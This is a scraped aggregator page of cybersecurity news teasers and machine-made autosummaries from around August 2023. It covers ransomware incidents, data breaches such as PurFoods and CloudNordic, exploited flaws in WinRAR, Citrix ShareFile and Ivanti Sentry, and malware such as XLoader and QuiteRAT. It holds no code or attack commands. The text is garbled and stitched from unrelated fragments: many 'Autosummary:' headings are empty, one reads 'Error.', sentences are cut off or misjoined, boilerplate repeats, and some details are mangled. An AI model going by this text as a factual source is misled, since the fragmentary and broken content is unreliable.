Posted: August 29, 2023 by Several researchers are seeing ransomware attacks targetting Cisco VPNs without MFA The Cisco Product Security Incident Response Team (PSIRT) has posted a blog about Akira ransomware targeting VPNs without Multi-Factor Authentication (MFA).Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files. "Categories: Business Tags: purfoods Tags: breach Tags: ransomware Tags: data Tags: information We take a look at a breach notice from food delivery service PurFoods. |
The post Meal delivery service PurFoods announces major data breach appeared first on Malwarebytes Labs.
"Autosummary:
The data potentially at risk, which is quite significant, includes: Date of birth Driver’s license/state identification number Financial account information Payment card information Medical record number Medicare and/or Medicaid identification Health information Treatment information Diagnosis code Meal category and/or cost Health insurance information Patient ID number Social Security numbers were involved for less than 1% of the total population, most of which are internal to PurFoods.From its site: We work with over 500 health plans, managed care organisations, governments, and agencies to provide access to meals for people covered under Medicare and Medicaid, as well as the opportunity for individuals to order meals on their own.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "Autosummary:
"In this Help Net Security video, Larry Whiteside, Jr., CISO at RegScale and President of Cyversity, discusses how, now more than ever, the cybersecurity industry needs the diversity of thought to address the increasingly complex and technology-driven challenges organizations face.
The post What true diversity in the cybersecurity industry looks like appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"The ongoing activities of the KmsdBot malware campaign indicate that IoT devices remain prevalent and vulnerable on the internet, making them attractive targets for building a network of infected systems," Cashdollar said. "Autosummary:
" watchTowr Labs security researchers have since developed and released a proof-of-concept (PoC) exploit that chains the SRX firewall flaws, a missing authentication for critical function vulnerability (CVE-2023-36846) and a PHP external variable modification bug (CVE-2023-36845). "Autosummary:
"Autosummary:
First, an effective password policy that ensures users’ passwords are strong in the first place mitigates against dictionary and brute force attacks that prey on common base terms, short password length, and keyboard walk patterns. Specops Password Policy allows organizations to create custom dictionaries to block base words related to their organization and industry, as well as blocking universally weak base terms, keyboard walk patterns, and short passwords.Keyboard walk patterns We usually think about weak, predictable passwords in terms of common base words, short length, and lack of complexity. Then a way to easily audit your Active Directory and make sure any strong passwords that become compromised through your own breach, or one elsewhere due to password reuse, are quickly changed. "Autosummary:
8 Areas of Vulnerability Testing Web Application-Based Vulnerability Assessment API-Based Vulnerability Assessment Network-Based Vulnerability Assessment Host-Based Vulnerability Assessment Physical Vulnerability Assessment Wireless Network Vulnerability Assessment Cloud-Based Vulnerability Assessment Social Engineering Vulnerability Assessment The 6 Phases of Vulnerability Assessment Methodology Determine critical and high-risk assets Perform a vulnerability assessment Conduct vulnerability analysis and risk assessment Remediate any vulnerability - E.G., applying security patches or fixing configuration issues. The Importance of E-commerce Application Security Testing E-commerce application security testing is essential to protect the personal and financial information of everyone linked to the application, including customers, dealers, and vendors. The 2023 Honda E-commerce Platform Attack Honda"s power equipment, lawn, garden, and marine products commerce platform contained an API flaw that enabled anyone to request a password reset for any account. In this article, we will discuss the recent Honda e-commerce platform attack, how it happened, and its impact on the business and its clients. "Autosummary:
IMG file contents Source: BleepingComputer BleepingComputer"s analysis shows that the executed Python script will check if the user is an admin of the device, and if so, make modifications to the system for persistence and then executes the "LockBit Locker" ransomware to encrypt files. "Autosummary:
"Autosummary:
Sophos has been monitoring this campaign since mid-August, reporting that the threat actor performs payload injections, uses BlueVPS for malware stating, deploys obfuscated PowerShell scripts, and drops PHP webshells on victim machines. "Autosummary:
"They kindly provided: more than 500000 SSN, passports of their clients and employees, driver"s licenses, patient files (profile, medical history), financial and legal documents!!!," reads the Rhysida data leak site. "Autosummary:
"Autosummary:
" The disclosure comes as Netenrich delved into a ransomware strain called ADHUBLLKA that has rebranded several times since 2019 (BIT, LOLKEK, OBZ, U2K, and TZW), while targeting individuals and small businesses in exchange for meager payouts in the range of $800 to $1,600 from each victim. "In 81% of ransomware attacks, the final payload was launched outside of traditional working hours, and for those that were deployed during business hours, only five happened on a weekday," the cybersecurity company said. "Cybersecurity insurance is a rapidly growing market, swelling from approximately $13B in 2022 to an estimated $84B in 2030 (26% CAGR), but insurers are struggling with quantifying the potential risks of offering this type of insurance. The traditional actuary models do not apply well to an environment where highly motivated, creative, and intelligent attackers are dynamically pursuing actions that cause insurable events. Accurate estimation of losses is key to determining customer premiums. But even after … More
The post Cybersecurity insurance is missing the risk appeared first on Help Net Security.
"Autosummary:
At maximum, they want a 70% loss ratio to cover their payouts and expenses and, according to the National Association of Insurance Commissioners Report on the Cyber Insurance Market in 2021, nearly half of the top 20 insurers, representing 83% of the market, failed to achieve the desired loss ratio.As part of that continuous exercise, there are opportunities to apply best practices to the insurance model to identify the most relevant aspects that include defensive postures (technology, behaviors, and processes) and understanding the relevant threat actors (targets, capabilities, and methods) to determine the residual risks. "Median attacker dwell time—the time from when an attack starts to when it’s detected—shrunk from 10 to eight days for all attacks, and to five days for ransomware attacks during the first half of 2023, according to Sophos. In 2022, the median dwell time decreased from 15 to 10 days. Gaining control of Active Directory In addition, Sophos X-Ops found that it took on average less than a day—approximately 16 hours—for attackers to reach Active … More
The post Ransomware dwell time hits new low appeared first on Help Net Security.
"Autosummary:
The impact, escalation, and recovery overhead of an Active Directory attack is why it’s targeted,” said John Shier, field CTO, Sophos.They can linger undetected to determine their next move, and, once they’re ready to go, they can blast through a victim’s network unimpeded,” Shier continued. "Consumers believe today’s cybersecurity talent shortage is in large part due to limited exposure to the profession and a lack of cybersecurity education and training at a younger age within school systems, according to ThreatX. 90% of consumers polled say they have concerns about the future of cybersecurity if more isn’t done at an earlier stage to expose students to the field, and 62% agree that if they or their child had more established education … More
The post Unrealistic expectations exacerbate the cybersecurity talent shortage appeared first on Help Net Security.
"Autosummary:
“With more than 3.4 million cybersecurity jobs still open worldwide, the cybersecurity industry is in desperate need of professionals, but at the same time, it’s still hard to get into the industry – both due to the unrealistic expectations of practitioners hiring today, but also in part due to limited exposure early on showcasing what’s available in this field, as our survey results have found,” said Gene Fay, CEO at ThreatX. “To close the cybersecurity talent gap, security vendors and education systems will need to partner to create more opportunities from mentorship and learning in schools, to considering more diverse candidates who might not meet today’s rigid degree requirements,” Fay continued. "Autosummary:
"North Korean state-sponsored hackers Lazarus Group have been exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) to target internet backbone infrastructure and healthcare institutions in Europe and the US. The group leveraged the vulnerability to deploy QuiteRAT, downloaded from an IP address previously associated with the Lazarus hacking group (aka APT38). QuiteRAT CVE-2022-47966 has been patched in mid-January 2023, and soon after a PoC exploit for it was publicly released and exploitation attempts started in earnest. The … More
The post Lazarus Group exploited ManageEngine vulnerability to target critical infrastructure appeared first on Help Net Security.
"Autosummary:
Its capabilities include arbitrary command execution, managing files of the infected endpoint, gathering of system information, reverse shell creation, spawning of new processes that allow download and deployment of additional payloads, and finally, the ability to self-delete from the compromised endpoint (when directed by the C2). "Autosummary:
Financial aid programs unaffected The exposed information includes full names and social security numbers, while email addresses, phone numbers, passwords, and banking data have not been affected by this data leak. "Categories: Business Tags: business Tags: hack Tags: hacked Tags: compromise Tags: lapsus$ Tags: convicted Tags: crime Tags: ransomware Tags: leak Tags: breach A wave of video game developer compromises has come to a court-based conclusion. |
The post Teenage members of Lapsus$ ransomware gang convicted appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. No ransom was paid, despite the attackers claiming to have source code belonging to Orange, BT, and EE in text messages sent out to 26,000 EE customers.There is no way that somebody in this situation, with their details leaked, and their hands caught in the cookie jar, would keep going. The infamous Lapsus$ ransomware gang gained notoriety for a number of attacks against companies involved in game development, or companies closely associated with gaming, such as Nvidia. "Categories: Business Tags: business Tags: home Tags: personal Tags: router Tags: wi-fi Tags: wireless Tags: network Tags: home Tags: bulb Tags: smart bulb Tags: IoT Tags: app Tags: TP-Link We take a look at reports that a smart lightbulb and app vulnerability could potentially put your Wi-Fi password at risk. |
The post Smart lightbulb and app vulnerability puts your Wi-Fi password at risk appeared first on Malwarebytes Labs.
"Autosummary:
The other high severity flaw, wtih a CVSS of 8.8, is related to incorrect authentication of the bulb, which means the device can be impersonated, allowing for Tapo password theft and device manipulation.You should also do this for all of your other smart appliances: Baby monitors, webcams, security systems, and utility service controls. "Autosummary:
The capabilities of CollectionRAT include arbitrary command execution, file management, system information gathering, reverse shell creation, new process spawning, fetching and launching new payloads, and self-deletion. "Talon Cyber Security has released new digital experience capabilities available in the Talon Enterprise Browser. The capabilities arm IT teams with advanced metrics on device, application, and network performance to ensure that issues can be proactively resolved, and employees have consistent user experiences that power productivity. “In today’s work-from-anywhere world, it is mission critical that security tools do not negatively impact the user experiences that workforces expect,” said Ohad Bobrov, CTO, Talon Cyber Security. “By … More
The post Talon unveils digital experience capabilities, equipping IT teams with advanced metrics appeared first on Help Net Security.
"Autosummary:
"Danish cloud hosting firms CloudNordic and Azero – both owned by Certiqa Holding – have suffered a ransomware attack that resulted in most customer data being stolen and systems and servers rendered inaccessible. The CloudNordic and Azero ransomware attack In the early morning hours of Friday, August 18, the attackers shut down all systems. The companies believe the attack happened while they were transfering servers from one data center to another. “Despite the fact that … More
The post Cloud hosting firms hit by devastating ransomware attack appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Telekopye is fully-featured, allowing its users to send phishing emails, generate web pages, send SMS messages, create QR codes, and create convincing images and screenshots of checks and receipts. "Autosummary:
" The malware is also configured to register with a remote command-and-control (C2) server by passing along a randomly generated "botID" in an HTTP POST request, following which the server responds with a success message and a secret unique identified that"s subsequently saved in a file named "%APPDATA%\Roaming\wlan\str-12.bin." The second phase of the attack involves scanning for Wi-Fi access points via the Windows WLAN API every 60 seconds. "Autosummary:
As a result, when a victim clicks on the image, a batch script present within the folder is executed instead, which is then used to launch the next-stage, an SFX CAB archive designed to extract and launch additional files. "Autosummary:
Interesting patterns also emerge when looking at Sophos data concerning days and times, indicating that threat actors, including ransomware operators, prefer to hit organizations on Tuesdays, Wednesdays, and Thursdays. "Autosummary:
"Autosummary:
"Autosummary:
" The activity, detected in early 2023, involved the exploitation of CVE-2022-47966, a mere five days after proof-of-concept (Poc) for the flaw emerged online, to directly deploy the QuiteRAT binary from a malicious URL. "Categories: Personal Cybersecurity isn"t limited to defending against malware anymore; it"s about ensuring your entire digital identity remains unscathed and your private details remain private. |
The post Malwarebytes acquires Cyrus Security appeared first on Malwarebytes Labs.
"Autosummary:
Cyrus security"s skills, expertise and technology will complement Malwarebytes" advanced threat detection and remediation capabilities in a number of exciting ways: Mobile security expertise One of the standout aspects of Cyrus Security is its unparalleled expertise in mobile user experience. "Belts have tightened, and that ROI and cost reduction are now driving CISO decision-making more than ever. In this Help Net Security video, Sara Behar, Content Manager at YL Ventures, discusses how enterprise cybersecurity budgets have been impacted by the downmarket and how vendors can adapt.
The post How the downmarket impacted enterprise cybersecurity budgets appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security interview, Roland Atoui, Managing Director at Red Alert Labs, discusses the intricacies of transitioning from isolated IoT setups to interconnected environments, examining the broadening attack surface and the nuanced complexities this evolution imposes. Atoui also delves into the urgency for standardization, the threat of cascade failures, and the blurred lines of accountability among stakeholders. Given the transition from siloed IoT devices to interconnected IoT environments, what are the main challenges … More
The post Anticipating the next wave of IoT cybersecurity challenges appeared first on Help Net Security.
"Autosummary:
This layered scrutiny reinforces the collective resilience of the entire IoT environement, addressing the multifaceted challenges of interoperability, security, and installation, and ultimately setting a benchmark in cybersecurity excellence.In this Help Net Security interview, Roland Atoui, Managing Director at Red Alert Labs, discusses the intricacies of transitioning from isolated IoT setups to interconnected environments, examining the broadening attack surface and the nuanced complexities this evolution imposes. A comprehensive understanding of the interaction between hardware, software, and human actors helps in creating a coherent, unified security strategy. "Cybercriminals employ artificial intelligence (AI) to create complex email threats like phishing and business email compromise (BEC) attacks, while modern email security systems use AI to counter these attacks, according to Perception Point and Osterman Research. AI’s role in email security The new study reveals a substantial shift in the perception of AI’s role in email security. Cybercriminals have shown rapid adoption of AI tools to their favor with 91.1% of organizations reporting that they … More
The post Cybercriminals turn to AI to bypass modern email security measures appeared first on Help Net Security.
"Autosummary:
AI-powered security is not just for email: Buyers of AI-enabled email security want the ability to better protect other communication and collaboration apps, such as Microsoft Teams, SharePoint, OneDrive, Zoom, and Slack, Salesforce, and more, with AI. "Autosummary:
"Phishing attacks using open redirect flaws are on the rise again, according to Kroll’s Cyber Threat Intelligence (CTI) team, which means organizations should consider refreshing employees’ awareness and knowledge on how to spot them. Malicious URL redirection Open redirect vulnerabilities in web applications allows threat actors to manipulate legitimate URLs to redirect victims to an external malicious URL. “They occur when a website allows for user-supplied input as part of a URL parameter in a … More
The post Open redirect flaws increasingly exploited by phishers appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The primary component of Spacecolon is ScHackTool, a Delhi-based orchestrator that"s used to deploy an installer, which, as the name implies, installs ScService, a backdoor with features to execute custom commands, download and execute payloads, and retrieve system information from compromised machines. "Autosummary:
The zero-day was fixed in WinRAR version 6.23, released on August 2, 2023, which also resolves several other security issues, including CVE-2023-40477, a flaw that can trigger command execution upon opening a specially crafted RAR file. "Malwarebytes is revolutionizing endpoint protection for IT constrained businesses with EDR Extra Strength, a new solution that combines the company’s deep historical threat intelligence knowledge with endpoint detection and response (EDR) and AI-driven tools for attack surface reduction and accelerated response. Even with standard endpoint security deployments, successful attacks are rampant — 83% of organizations have had more than one data breach and 71% of organizations were impacted by ransomware last year. EDR Extra Strength … More
The post Malwarebytes releases EDR Extra Strength for endpoint protection appeared first on Help Net Security.
"Autosummary:
Alert prioritization which filters, prioritizes and categorizes alerts Step-by-step guidance for addressing and resolving critical issues “Good enough has proven not enough to protect organizations from today’s threat landscape which has become so complex that the majority of alerts generated by traditional EDR solutions are ignored,” said Marcin Kleczynski, CEO, Malwarebytes. "A new macOS-specific variant of the well known XLoader malware is being delivered disguised as the “OfficeNote” app. “Multiple submissions of this sample have appeared on VirusTotal throughout July, indicating that the malware has been widely distributed in the wild,” SentinelOne researchers said. The new XLoader macOS malware variant XLoader is a malware-as-a-service infostealer and botnet that has been active since 2015, but first appeared as a macOS variant in 2021, written in Java. “The … More
The post Bogus OfficeNote app delivers XLoader macOS malware appeared first on Help Net Security.
"Autosummary:
The new XLoader macOS malware variant XLoader is a malware-as-a-service infostealer and botnet that has been active since 2015, but first appeared as a macOS variant in 2021, written in Java. "Autosummary:
" The Android malware also requests victims to grant it permissions to Android"s accessibility services, allowing it to harvest a wealth of information that would be valuable to cyber criminals, including call logs, contacts, external storage, location, and SMS messages. "Autosummary:
"Since we neither can nor wish to meet the financial demands of the criminal hackers for a ransom, CloudNordic"s IT team and external experts have been working intensively to assess the damage and determine what could be recovered," reads CloudNordic"s statement (machine translated) "Sadly, it has been impossible to recover more data, and the majority of our customers have consequently lost all their data with us. "Financially-motivated attackers have exploited a zero-day vulnerability in WinRAR (CVE-2023-38831) to trick traders into installing malware that would allow them to steal money from broker accounts. “This vulnerability has been exploited since April 2023,” says Group-IB malware analyst Andrey Polovinkin. Devices of at least 130 traders (and likely more) have been infected with malware in this campaign. CVE-2023-38831 exploited CVE-2023-38831 is a file extension spoofing vulnerability, which allowed attackers to create a modified RAR or … More
The post Attackers exploited WinRAR zero-day for months to steal money from brokers (CVE-2023-38831) appeared first on Help Net Security.
"Autosummary:
The decoy file is opened, too, to complete the illusion, but in the background DarkMe, GuLoader, and/or Remcos RAT malware gets quietly installed, thus allowing attackers to remotely access the victim’s computer. "Autosummary:
High-profile organizations impacted by Lapsus$ also include Microsoft, Cisco, Okta, Nvidia, T-Mobile, Samsung, Vodafone, Ubisoft, 2K, and Globant. "Autosummary:
Sensitive data compromised in the breach includes Discord.io members" usernames, email addresses, billing addresses (of a limited number of individuals), salted and hashed passwords (affecting a limited number of individuals), and their respective Discord IDs. "Categories: Exploits and vulnerabilities Categories: News Tags: Ivanti Tags: Sentry Tags: MobileIron Tags: CVE-2023-38035 Tags: MICS Tags: port 8443 There is some uncertainty about whether a vulnerability in Ivanti Sentry is being exploited in the wild, but why take the risk when you can patch? |
The post Ivanti Sentry critical vulnerability—don"t play dice, patch appeared first on Malwarebytes Labs.
"Autosummary:
A remote, unauthenticated attacker could exploit this vulnerability to change configuration files, run system commands, or write files to the system. "Categories: Exploits and vulnerabilities Categories: News Tags: Adobe Tags: ColdFusion Tags: CVE-2023-26359 Tags: CVE-2023-26360 Tags: critical Tags: known exploited Tags: deserialization A second Adobe ColdFusion vulnerability that was patched in April has been added to CISA"s known exploited vulnerabilities catalog. |
The post Adobe ColdFusion vulnerability exploited in the wild appeared first on Malwarebytes Labs.
"Autosummary:
To successfully remediate against this vulnerability the latest updates for ColdFusion should be applied, specifically: ColdFusion 2021 Update 6 or later ColdFusion 2018 Update 16 or later Another critical vulnerability tackled in this update is CVE-2023-26360—an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. "In this Help Net Security video, Andy Hornegold, Product Lead at Intruder, dives into API security and explores how several recent high-profile breaches were caused by simple failings – which didn’t require sophisticated security to prevent. The number of APIs is increasing year on year as more organizations are building APIs to facilitate automation. As part of that, there’s an increasing attack surface for opportunistic hackers. Knowing where your APIs are and understanding how an … More
The post Understanding how attackers exploit APIs is more important than ever appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Japanese watchmaker Seiko has been added to ALPHV (BlackCat) ransomware group’s victim list, following a data breach occurring in early August. The Seiko data breach The company published a data breach and response notice on August 10, 2023, stating that an unidentified party gained unauthorized access to at least one of their servers. On August 2, Seiko hired a team of external cybersecurity experts to investigate the data breach. “As a result, we are now … More
The post Seiko joins growing list of ALPHV/BlackCat ransomware victims appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" Once executed, OfficeNote throws an error message saying it "can"t be opened because the original item can"t be found," but, in reality, it installs a Launch Agent in the background for persistence. "Ivanti is urging administrators of Ivanti Sentry (formerly MobileIron Sentry) gateways to patch a newly discovered vulnerability (CVE-2023-38035) that could be exploited to change configuration, run system commands, or write files onto the vulnerable system. “As of now, we are only aware of a limited number of customers impacted by CVE-2023-38035,” the company said in the advisory, but still has to clarify whether that means detected exploitation attempts or simply vulnerable installations reachable via internet. … More
The post Ivanti Sentry zero-day vulnerability fixed, patch ASAP! (CVE-2023-38035) appeared first on Help Net Security.
"Autosummary:
As the Mnemonic researchers explained, “Ivanti Sentry is a server in an Ivanti deployment that serves as a gatekeeper between mobile devices and a company’s ActiveSync server, such as a Microsoft Exchange Server, or with a backend resource such as a Sharepoint server, or it can be configured as a Kerberos Key Distribution Center Proxy (KKDCP) server. "Autosummary:
Lack of SaaS Compliance Monitoring Presents Further Risk to Organizations Operating in Advanced Economies Global Compliance Requirements Image courtesy of AppOmni Maintaining compliance with regional and international regulations such as GDPR, HIPAA, CCPA, APPI, and industry-specific standards also proved challenging for the research study participants.With a cohort based in North America (U.S.), Europe (UK, France, and Germany), and APAC (Japan and Australia), abiding by legislation that carries stiff fines and consequences for noncompliance should be a top cybersecurity priority." SaaS Cybersecurity Incidents in the Last 12 Months (June 2023) Image courtesy of AppOmni The SaaS Footprint, and its Corresponding Risk, is Grossly Underestimated Critical operations in both SMBs and the enterprise increasingly rely on cloud and SaaS infrastructure. Misreading the SaaS Cyber Threat Model While SaaS-to-SaaS (sometimes called third-party integrations or third-party apps) connections are a boon to productivity, they"re a bane to security. A properly resourced SaaS cybersecurity program will reduce the risk of SaaS-related data breaches, scale SaaS cybersecurity as organizational usage grows, automate compliance and risk reporting, and realize cost savings and operational efficiencies across the SaaS estate.For example: When asked to rate the SaaS cybersecurity maturity level of their organizations, 71% noted that their organizations" SaaS cybersecurity maturity has achieved either a mid-high level (43%) or the highest level (28%). "Autosummary:
" New HiatusRAT campaign (Lumen Black Lotus Labs) This campaign follows an earlier series of attacks where over a hundred businesses, mainly from Europe, North America, and South America, were infected with HiatusRAT to create a covert proxy network. "Autosummary:
Cisco VPN trait seen in eight Akira attacks Source: SentinelOne Remote RustDesk access Additionally, SentinelOne"s analysts observed Akira using the RustDesk open-source remote access tool to navigate compromised networks, making them the first ransomware group known to abuse the software. "Categories: Exploits and vulnerabilities Categories: News Tags: WinRAR Tags: CVE-2023-40477 Tags: RCE Tags: Windows 11 A new version of WinRAR is available that patches two vulnerabilities attackers could use for remote code execution. |
The post Update now! WinRAR files can be abused to run malware appeared first on Malwarebytes Labs.
"Autosummary:
“We have added native support for additional archive formats, including tar, 7-zip, rar, gz and many others using the libarchive open-source project.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Users of a cracked version of the software, which is probably another big group of users, will not be able to install the latest version right off the shelf, so they may remain vulnerable as well. "There is a standard playbook and best practice for when an organization discovers or is notified about a software vulnerability: The organization works quickly to fix the problem and, once a fix is available, discloses that vulnerability for the benefit of the community. This playbook is not always perfect, but it strikes a reasonable compromise between providing time to fix a vulnerability and disseminating that knowledge to help prevent similar vulnerabilities in the future. The … More
The post How EU lawmakers can make mandatory vulnerability disclosure responsible appeared first on Help Net Security.
"Autosummary:
Under the CRA (in its current form), this is how the reporting requirement would work: when a manufacturer identifies an actively exploited vulnerability, the manufacturer has 24 hours to report it to the European Union Agency for Cybersecurity (ENISA).But the CRA may have a chilling effect on this kind of good-faith security research and businesses may decide to take an ignorance-is-bliss approach—after all, if an ethical hacker does surface an unpatched vulnerability, the company will have to report it to ENISA with all the potential risks associated. "Autosummary:
The latest set of attacks, observed from mid-June through August 2023, entail the use of pre-built HiatusRAT binaries specifically designed for Arm, Intel 80386, and x86-64 architectures, alongside MIPS, MIPS64, and i386. "Autosummary:
"Autosummary:
" Romanian cybersecurity company Bitdefender, in its own macOS Threat Landscape Report, said that Mac users are predominantly targeted by three key threats in the past year: Trojans (51.8%), Potentially Unwanted Applications (25.3%), and Adware (22.6%). "Autosummary:
"Autosummary:
One week ago, Ivant also fixed two critical stack-based buffer overflows tracked as CVE-2023-32560 in its Avalanche software, an enterprise mobility management (EMM) solution, that could lead to crashes and arbitrary code execution following exploitation. "Autosummary:
For example, the group was the first to use a clearweb website dedicated to leaking data for a particular victim and, more recently, created a data leak API, allowing for easier distribution of stolen data. "Autosummary:
Potentially malicious extensions removed from Chrome Web Store Source: Google Google says that extensions can be removed from the Chrome Web Store because they were unpublished by the developer, violated policies, or were detected as malware. "Autosummary:
" Complete attack chain (BlackBerry) Cuba still very active BlackBerry underlines the clear financial motivation of the Cuba ransomware gang and mentions that the threat group is likely Russian, something that has been hypothesized by other cyber-intelligence reports in the past. "Autosummary:
"Autosummary:
"The tactics and techniques are very similar, but the infrastructure is now more robust than before to defeat potential takedown attempts," Jérôme Segura, director of threat intelligence at Malwarebytes, said. "Autosummary:
Contents of the ZIP files fetched from cloud buckets (SentinelLabs) SentinelLabs notes that the .NET executables feature a geofencing restriction that prevents the malware from running in the United States, Germany, France, Russia, India, Canada, or the United Kingdom. "Autosummary:
"The TSA has announced updates to its Security Directive (SD) to strengthen the operational resilience of oil and natural gas pipeline owners and operators against cyber-attacks. In this Help Net Security video, Chris Warner, OT Senior Security Consultant at GuidePoint Security, discusses how these newly introduced provisions mandate pipeline owners and operators to proactively enhance their systems’ security and protect against potential cybersecurity threats in the oil and natural gas sector. Despite the resource challenges, … More
The post A closer look at the new TSA oil and gas pipeline regulations appeared first on Help Net Security.
"Autosummary:
"Phishing remains the most dominant and fastest growing internet crime, largely due to the ubiquity of email and the ceaseless issue of human error that is preyed upon by today’s threat actors, according to Cloudflare. While business email compromise (BEC) losses have topped $50 billion, corporate organizations are not the only victims that attackers are after. The real implications of phishing go beyond Fortune 500’s and global companies, extending to small and local organizations as … More
The post 30% of phishing threats involve newly registered domains appeared first on Help Net Security.
"Autosummary:
Phishing attack trends Malicious links were the #1 threat category, comprising 35.6% of detected threats Identity deception threats are on the rise — increasing YoY from 10.3% to 14.2% (39.6 million) of total detections Attackers posed as more than 1,000 different organizations in over 1 billion brand impersonation attempts. "ESET researchers have uncovered a mass-spreading phishing campaign aimed at collecting Zimbra account users’ credentials. Zimbra Collaboration is an open-core collaborative software platform, a popular alternative to enterprise email solutions. About the Zimbra phishing campaign The campaign has been active since at least April 2023 and is still ongoing. It targets are a variety of small and medium businesses and governmental entities. According to ESET telemetry, the largest number of targets are located in Poland; … More
The post Zimbra users in Europe, Latin America face phishing threat appeared first on Help Net Security.
"Autosummary:
In this manner, it is much easier to circumvent reputation-based antispam policies, especially compared to more prevalent phishing techniques, where a malicious link is directly placed in the email body,” explains ESET researcher Viktor Šperka, who discovered the campaign. "Autosummary:
"Autosummary:
Examples of such deviations include suspicious connections, unusual data transfers, traffic patterns that fall outside established norms, lateral movements within the network, data exfiltration, and more.According to the Forrester report, security and risk professionals should employ Network Detection and Response (NDR) tools to monitor their networks, search for threats, detect applications and assets, and capture malicious data packets.Cybercriminals use fake identities or zero-day exploits to infiltrate corporate networks, then move laterally across the network to search for targets, gain access to privileged systems, install ransomware or other malware, and exfiltrate corporate data. "Autosummary:
Another notable tactic is the targeting of managed service providers (MSPs) as entry points to breach downstream corporate networks, as evidenced in a Play ransomware campaign aimed at finance, software, legal, and shipping and logistics industries, as well as state, local, tribal and territorial (SLTT) entities in the U.S., Australia, U.K., and Italy. "Autosummary:
Specifically, Interpol"s and its partners" investigation, whose findings served as the guidance for "Africa Cyber Surge II" include the following: 3,786 malicious command and control servers 14,134 victim IPs linked to data stealer cases 1,415 phishing links and domains 939 scam IPs Over 400 other malicious URLs, IPs, and botnets Group-IB, one of Interpol"s partners in collecting intelligence from cybercrime originating from African regions, today stated that it provided the law enforcement authorities with over a thousand indicators related to malicious infrastructure in the continent. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @malwrhunterteam, @LawrenceAbrams, @fwosar, @BleepinComputer, @billtoulas, @serghei, @Seifreed, @demonslay335, @Jon__DiMaggio, @security_score, @vxunderground, @MsftSecIntel, @TrendMicro, @IBMSecurity, @felixw3000, @uptycs, @BushidoToken, @adlumin, and @pcrisk.The campaign is currently targeting mid- market enterprises in the finance, software, legal, and shipping and logistics industries, as well as state, local, tribal and territorial (SLTT) entities in the U.S., Australia, U.K., and Italy. "Categories: Exploits and vulnerabilities Categories: News Tags: Citrix Tags: ShareFile Tags: CVE-2023-24489 Tags: RCE Tags: unauthenticated Tags: vulnerability Tags: PoC Citrix ShareFile can be exploited remotely by unauthenticated attackers. |
The post Patch now! Citrix Sharefile joins the list of actively exploited file sharing software appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.Due to errors in how ShareFile handles cryptographic operations, attackers can generate valid padding which enables unauthenticated attackers to upload arbitrary files, leading to remote code execution (RCE). "Autosummary:
The phishing attacks feature PDF documents with diplomatic lures, some of which are disguised as coming from Germany, to deliver a variant of a malware called Duke, which has been attributed to APT29 (aka BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock, Midnight Blizzard, and The Dukes). "Cleaning products manufacturer Clorox Company announced that it has taken some systems offline in response to a cyberattack. The Clorox Company is a multinational consumer goods company that specializes in the production and marketing of various household and professional cleaning, health, and personal care products. The cleaning product giant announced it was the victim of […]
The post Cleaning Products manufacturer Clorox Company took some systems offline after a cyberattack appeared first on Security Affairs.
"Autosummary:
"Hidden in the basic infrastructure that runs the US military is a powerful piece of Windows-borne Chinese malware that can disrupt the communications systems, power grids, and water supplies at the military’s bases around the world. One US congressional aide calls it a “ticking time bomb” that as The New York Times put it, “could give China the power to interrupt or slow American military deployments or resupply operations by cutting off power, water and communications to US military bases.”
Autosummary:
According to Microsoft, the hack, called Storm-0558, "focuses on espionage, data theft, and credential access.”It’s hacked into the accounts not just of Raimondo, but also, the Washington Post reports, “the email accounts of a congressional staffer, a U.S. human rights advocate and U.S. think tanks.” Former officials said the hack “would have allowed Beijing to see into diplomats" planning for a succession of high stakes visits to China in June and July by U.S. cabinet members, including Secretary of State Antony Blinken, Raimondo and US Treasury Secretary Janet Yellen," according to Newsweek. "Autosummary:
Error. "CVE-2023-24489, a critical Citrix ShareFile vulnerability that the company has fixed in June 2023, is being exploited by attackers. GreyNoise has flagged on Tuesday a sudden spike in IP addresses from which exploitation attempts are coming, and the Cybersecurity and Infrastructure Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities Catalog. About CVE-2023-24489 Unearthed and reported by Assetnote researcher Dylan Pindur, CVE-2023-24489 affects the popular cloud-based file-sharing application Citrix ShareFile, more specifically its … More
The post Citrix ShareFile vulnerability actively exploited (CVE-2023-24489) appeared first on Help Net Security.
"Autosummary:
About CVE-2023-24489 Unearthed and reported by Assetnote researcher Dylan Pindur, CVE-2023-24489 affects the popular cloud-based file-sharing application Citrix ShareFile, more specifically its storage zones controller (a .NET web application running under IIS). "Autosummary:
From the hardware and software of the network itself, to all the devices used to access it, from IoT endpoints to laptops and smartphones, network security now needs to look beyond the perimeter to your cloud resources, edge devices, third-party hosted content, integrations with other hardware or software, and assets hosted in dispersed offices. Continuous network monitoring with Intruder Advanced network monitoring tools like Intruder run daily network scans so your network view is always accurate and up to date – showing active and unresponsive targets, any changes since your last scan, expiring certificates, and the ports and services you expect – and more importantly, don"t expect – to be exposed to the internet. "Autosummary:
Targets heatmap (ESET) Pretending to be Zimbra admins According to the ESET researchers, the attacks start with a phishing email pretending to be from an organization"s admin informing users of an imminent email server update, which will result in temporary account deactivation. "Autosummary:
